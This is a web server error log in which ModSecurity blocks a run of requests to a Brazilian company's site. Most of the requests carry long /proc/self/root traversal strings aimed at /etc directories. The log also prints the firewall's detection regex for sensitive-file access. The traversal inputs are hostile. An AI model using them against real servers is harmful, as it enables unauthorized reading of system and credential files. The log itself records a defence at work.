[Mon Mar 16 10:08:12.279765 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.243.203:52878] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAvI6lpbStxTqkSktfsgAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:08:14.568098 2026] [:error] [pid 11972:tid 140411599251200] [client 74.7.241.46:38788] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAvpqj1wV0Si-OkefaQgAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:08:18.315813 2026] [:error] [pid 11972:tid 140411666392832] [client 74.7.244.31:57950] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgAwpqj1wV0Si-OkefaSQAAAAk"]
[Mon Mar 16 10:08:21.055472 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.243.203:51970] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAxZqj1wV0Si-OkefaTAAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:08:23.384434 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.243.203:51426] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAx7ABkC4fWIHEf8HbpQAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:08:25.687331 2026] [:error] [pid 32654:tid 140411632822016] [client 74.7.243.203:51434] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAyQlT9VtDQc7bgUydBAAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:09:23.198897 2026] [:error] [pid 10709:tid 140411725141760] [client 74.7.243.203:51438] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBAxXjF1vJNtV6CWrqYwAAAcI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:09:24.483041 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.243.203:51694] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBBLABkC4fWIHEf8Hb0wAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:09:31.131225 2026] [:error] [pid 11972:tid 140411599251200] [client 74.7.243.203:51710] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBC5qj1wV0Si-OkefaXwAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:09:36.068021 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.243.203:40168] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBEP9ocpUE4ed4uDzedAAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:09:42.817353 2026] [:error] [pid 10651:tid 140411607643904] [client 74.7.243.203:40174] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBFrysWC90G-1nBrA16QAAAZA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:09:46.468220 2026] [:error] [pid 21946:tid 140411624429312] [client 74.7.243.203:39764] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/securetty"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBGnbQATo66fKoS7w-hQAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:09:47.817621 2026] [:error] [pid 10772:tid 140411708356352] [client 74.7.243.203:39776] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/odbcinst.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBG_9ocpUE4ed4uDzedwAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:09:49.110990 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.243.203:39784] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBHY6lpbStxTqkSktfvwAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:09:50.453034 2026] [:error] [pid 10772:tid 140411632822016] [client 74.7.243.203:42972] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBHv9ocpUE4ed4uDzeeAAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:09:51.749460 2026] [:error] [pid 21946:tid 140411658000128] [client 74.7.243.203:42978] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBH3bQATo66fKoS7w-iAAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:09:53.039530 2026] [:error] [pid 10772:tid 140411540502272] [client 74.7.243.203:42986] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBIf9ocpUE4ed4uDzeegAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:09:54.345948 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.243.203:43002] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBIrABkC4fWIHEf8Hb7QAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:09:56.860082 2026] [:error] [pid 10651:tid 140411733534464] [client 74.7.243.203:43008] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBJLysWC90G-1nBrA17QAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:09:58.135912 2026] [:error] [pid 10709:tid 140411565680384] [client 74.7.243.203:43018] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBJhXjF1vJNtV6CWrqZwAAAdU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:10:02.278379 2026] [:error] [pid 32654:tid 140411691570944] [client 74.7.243.203:43026] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBKglT9VtDQc7bgUydnQAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:10:03.609859 2026] [:error] [pid 10651:tid 140411683178240] [client 74.7.243.203:34712] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBK7ysWC90G-1nBrA17gAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
